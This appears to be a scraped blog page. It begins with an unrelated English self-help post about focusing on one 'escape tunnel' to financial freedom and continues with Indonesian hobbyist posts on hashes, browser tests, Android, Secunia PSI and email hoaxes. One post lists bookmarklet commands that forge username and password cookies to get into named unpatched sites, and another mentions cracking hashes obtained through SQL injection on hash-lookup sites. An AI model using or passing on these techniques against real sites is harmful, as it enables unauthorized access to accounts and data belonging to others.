Your Escape Tunnel

by Anthony on September 13, 2006

=====================
In today’s pressure-filled society, it is easy to feel as though you are trapped inside ‘The System’. Many people feel trapped by their job and their financial circumstances and find themselves yearning for freedom.
This freedom involves not only financial freedom, but also the freedom to do what you want, when you want, with who you want. Perhaps you can relate to the following picture?

In an effort to break free from ‘The System’, many people investigate different options for creating passive income such as share trading, property investing, network marketing or starting a business.
Each of these options is like starting to dig an escape tunnel that can lead you to freedom from the system as shown below.

But here is the biggest mistake mistake that people make…
They begin to dig their escape tunnel and initially make some progress, but then things start to get tough, so they give up on their tunnel and decide to start digging a different tunnel.
For example, you buy an investment property and then have a bad experience with a tenant. At the same time you hear about a ‘revolutionary’ new share trading system that is guaranteed to work, so you stop digging your property investing tunnel and start digging a share trading tunnel.

This situation is sometimes known as ‘opportunity hopping’
The problem with opportunity hopping is that the end result is usually this:
You end up doing a lot of digging but remain trapped in ‘The System’ with multiple escape tunnels that lead nowhere.
So what’s the answer?
The answer is *FOCUS*.
To achieve the freedom you desire, you must carefully review your options and then commit yourself to focusing on the tunnel that you believe will give you the best chance of success.
This opportunity you choose is up to you and depends on your personality, your skills, and most importantly – what you enjoy.
By committing to one tunnel and focusing all your energies on consistent digging, you will maximize your chances of achieving the freedom you and your family deserve.

*Action Steps:*
This week, take time to really sit down and review all the ‘projects’ and ‘ideas’ you have been working on and ask yourself these two important questions.
(1) Which opportunity am I most passionate about?
(2) Which opportunity do I believe offers me the greatest chance of success?
When you can answer these two questions, commit to your escape tunnel and
keep digging!
Until next time,
Dare To Dream!

===========

dikutip dari Amir SH

WBR
kernellicious

web based Hash(-ing)

apa sich software tuk cek nilai hash

kemaren ada yang nyasar ke blog ini ama kata kunci itu :D
saya orangnya pemalas dan rada parno ama software gratisan … takutnya disisipin trojan di softwarenya dan ga ke detect ama antivitus+update terbarunya sekalipun :(

makanya untuk hash-ing (convert to/reverse) saya lebih suka “web based hash(-ing)” :D (makin parah ajah ni kosakata IT nya :p) … beberapa situs yang saya suka pake:
-passcracking
-benramsey
-hashcrack
-reversehas
-dustinfineout

Kenapa link2 diatas? soalnya saya sering nemu “jawaban” dari hasil sql injection disana :D ,databasenya lumayan okeh :D … trus beberapa link diatas udah pake kombinasi teknik: classic rainbow tables, hybrid rainbow tables, & dictionary … dan yang paling penting: gratis, ga usah registrasi, & ga perlu install :D

javascript injection

lagi nyari informasi tentang sql injection trus “nyasar” ke sekuritionline … eh malah dapet informasi tentang javascript :D
celah ini juga sudah di publish di beberapa website sekuriti lain, termasuk secunia.

berikut ini beberapa situs yang masih belum di patch waktu saya coba:
ebook
hotscripts
rss
membership
recipe

cukup masukan javascript berikut ke address bar di browser:

javascript:document.cookie = “username=kanabies; path=/”;

javascript:document.cookie = “password=kanabies; path=/”;

perintah itu akan membuat username dan password: kanabies
hal ini bisa dicek dengan memasukan salah satu syntax berikut ke address bar di browser:

javascript:alert(document.cookie)

javascript:alert(unescape(document.cookie))

javascript:alert(unescape(document.cookie).replace(/;/gi,”\n\n”))

javascript:alert(unescape(unescape(document.cookie)).replace(/;/gi,”\n\n”))

setelah itu kita bisa masuk ke menu yang ada dan menjalankan perintah/fitur yand ada :D

di firefox ada addon yang khusus untuk mengedit cookies:
firefox-addons

CMIIW,
ga ada sql … javascript pun jadi :D

sumber:
sekuritionline
jammed
javaranch

Secunia- Personal Software Inspector (PSI)

PSIUntuk menjaga keamanan aplikasi-aplikasi yang terinstall di komputer kita ada baiknya apabila kita selalu meng-update patches atau menginstall versi terbaru dari aplikasi-aplikasi yang kita gunakan. Secunia, computer security service provider dari denmark yang didirikan oleh Niels Henrik Rasmussen dan Thomas Kristensen, membuat sebuah aplikasi gratis (untuk penggunaan personal) yang membantu kita untuk men-scan&udpate dari masing2 aplikasi yang terinstall di komputer kita. Selain untuk meng-update aplikasi yang ada, secunia juga bisa untuk men-scan virus. Adapun produk yang dikembangkan oleh mereka adalah:
-Enterprise Security Manager
-Vulnerability Tracking Service
-Surveillance Scanner
-Network Software Inspector
-Personal Software Inspector
-Online Software Inspector

Beikut fitur utama secunia-PSI:
-Scan, melakukan scan terhadap program-program yang ada di komputer
-Insecure Program, memberikan informasi program yang “kurang aman” dan memberikan informasi link download program terbaru atau solusinya, add/remove program, referensi online, detail dan sebagainya.
-End of Life, memberikan informasi program yang tidak di support lagi oleh vendor pembuatnya. Disertai link download versi terbaru atau untuk uninstall.
-Patched, memberikan informasi program yang dideteksi, tetapi diketahui tidak mempunyai update security (jadi mungkin tidak memerlukan perhatian yang lebih)
-Overview, memberikan informasi (gambaran umum) kondisi komputer setelah di scan.

Di ZDNet, Secunia PSI masuk daftar 10 besar Essential security tools, dan berada di urutan pertama dalam kategori free software. Aplikasi ini hanya berukuran sekitar 521 KB dan bisa berjalan di platform Windows 2000, XP 32/64bit, dan Vista 32/64bit. Agar bisa berjalan (Scan) maka perlu adanya koneksi internet.

Link:
en.wikipedia.org
download PSIsetup.exe
advisories

CMIIW,
Stay secure :D

google android

GA Android adalah mobile OS yang dikembangkan dari kernel linux v2.6 (monolithic) oleh android.inc yang kemudian diakuisisi oleh google dan kemudian dilanjutkan pengembangannya oleh Open Handset Alliance (OHA), yang merupakan aliansi bersama antara beberapa perusahaan terkenal. android nantinya akan bertarung melawan mobile OS lainnya seperti: symbian, windows mobile, blackberry, dan mac. Meskipun awalnya dikembangkan sebagai mobile OS , Programmer dari US bernama Krzykowski dan Daniel Hartmann memaparkan hasil percobaan mereka di blognya bahwa mereka berhasil menginstall android di netbook Asus Eee PC meskipun menurut mereka masih banyak kekurangannya.

Beberapa kritik tentang android:
-biarpun dikembangkan dari kernel linux, android tidak mensupport full set of standard Linux libraries, termasuk GNU C Library yang mengakibatkan android sulit untuk menggunakan aplikasi atau libraries Linux yang sudah ada
-Android tidak memakai Java standards yang sudah berkembang, contohnya: Java SE and ME, ini membuat kompatibilitas antara aplikasi yang ditulis menggunakan Java dengan aplikasi platform Android menjadi tidak kompatibel.
-Android tidak memperbolehkan aplikasi diinstall melalui memory card.

Beberapa link tentang android:
android.com
code.google.com
en.wikipedia.org
video android

CMIIW.
Shoutz for all member :D
ps: kalo migrate dah selese mo pake CMS apa?

Best browser?

banyak banget browser yang ada sekarang ini, walaupun ga bisa disangkal kalo IE(Internet Explorer) adalah browser paling banyak digunakan. Tapi sekarang ini para pengguna komputer, khususnya para pengguna internet mulai mencari alternatif browser selain IE, dan mungkin yang paling terkenal adalah firefox, tapi benarkah firefox adalah browser yang paling bagus? Bagus atau tidak nya suatu browser bisa jadi relatif menurut cara pandang pengguna. untuk itu organisasi bernama: The Web Standards Project membuat standardisasi untuk menginterpretasikan HTML, CSS, dan Javascript sesuai standard W3C, adapun situs khusus untuk men-test browser kesayangan kalian: http://www.acidtests.org/ (kalian bisa menemukan+baca dokumentasi tentang acid disini)

Ada tiga tahap untuk mengecek browser2 ini:

-acid1
-acid2
-acid3

Acid reference result:
-acid1: Acid1_reference
-acid2: Acid2_reference
-acid3: Acid3_reference_webkitr30069

Di bawah ini contoh hasil test untuk beberapa browser terkenal:
-Sciactive
-anomalousanomaly

Cukup kaget juga … baru tau ternyata browser sekelas firefox pun ga lulus acid 2+3 :D … cuman safari ama opera versi terbaru yang lolos acid2+3 :D

Dari beberapa test yang saya lakukan dan beberapa referensi hasil test dari situs2 lain … semuanya menempatkan safari sebagai yang pertama di ikuti oleh opera di tempat kedua, safari lolos semua test acid yang ada dan unggul dari segi kecepatan dalam mengakses situs yang dituju. Jadi kesimpulannya safari adalah browser terbaik? Menurut anda?

CMIIW,
Shoutz for all K* member :D

(don’t) Pass the Hoax

vsxnl1d3ht0gi4xwl8u

“apapun beritanya … minumnya teh botol sosro :D”

“Re-Check before pass it on”… mungkin itu bisa jadi solusi yang jitu untuk mengurangi penyebaran hoax … seringkali kita hanya baca sekilas dan kemudian maen terusin ke orang lain, atau mungkin yang lebih parahnya, di forward ke milis2 … atau mungkin juga kita sudah baca keseluruhan dan masih tetep ikut menyebarkan pesen yang ternyata hoax, karena mengira itu adalah berita yang valid dan beguna bagi orang lain :D

ya … sekarang banyak banget hoax yang “asli” … maksudnya saking pinternya yang bikin hoax ampe susah bedain/nentuin kalo ternyata berita itu palsu … kaya berita di bawah ini:

http://www.detikinet.com/read/2009/05/11/133018/1129478/398/teh-botol-sosro-jadi-korban-e-mail-tipuan

kekekekeke … si pengirim hoax (hoaxer? :D ) pake jurus “sayang anak” untuk mengelabui para pembaca (mungkin targetnya orang tua yang concern abis ama kesehatan anaknya) … trus si hoaxer bawa2 pengesahan dari sumber terpercaya seperti “Universitas terkenal di Amerika” dan sumber/pakar: Dr. Priyadi Handoko, ahli kesehatan dari IKDN … dan seperti biasa … last but not least … the magic word of hoax: “pass/spread the news (hoax)!” :D

sang pembuat hoax itu terang2an mengakui kalo dia yang buat berita hoax itu :D … setelah baca di blognya, http://hariadhi.wordpress.com/2009/05/08/kronologis-hoax-teh-botol-sosro/ ternyata dia sengaja membuat berita hoax itu untuk bahan diskusi tentang “negative approach” di komunitas CCI (creative_circle_ind) dan ternyata ada yang nyebarin email tersebut di luar komunitas itu :D

pesan moral:

-selalu crosscheck pesan/berita sebelum meneruskannya ke orang lain, google dan wikipedia bisa jadi salah satu sarana pencarian yang bisa diandalkan

-kreatif tanpa tanggung jawab bisa berakibat kriminal …. boleh kreatif tapi jangan ngerugiin orang lain donk … pasti si hoaxer sosro ini juga ga mau kan dibilang orang sakit jiwa ama orang lain (yang bakal bilang misalnya kalo dia lagi diskusi tentang “psikologis marketing” dengan si hoaxer sosro sebagai kelinci percobaannya :D)

-hati2 dengan perkataan anda, bisa jadi pihak yang terkait akan melayangkan tuntutan kepada anda … denda uang/hukuman penjara bisa jadi menanti :(

berikut sanggahan dari pihak sosro:

http://sosro.com/Klarifikasi-Tehbotol-Sosro-Mengenai-HOAX-Hydroxilic-Acid.php

dan permintaan maaf dari hoaxer

http://hariadhi.wordpress.com/2009/05/07/permintaan-maaf-untuk-teh-botol-sosro/

kalo kata orang jawa bilang sih: “onno-onno w purbo” … yang artinya: “ada2 aja” :D

ayo tebak berita ini bener apa hoax:

http://www.detikinet.com/read/2009/04/22/111816/1119486/323/nokia-1100-bekas-laku-rp-300-juta

… be a smart reader … don’t get fooled by fool …

CMIIW,

SGK

*Shout for other members … kapan nih migratenya :(

*forward berita ini ke semua orang yang anda sayangi supaya mereka tidak ikut menyebarkan berita hoax :p

Follow

Get every new post delivered to your Inbox.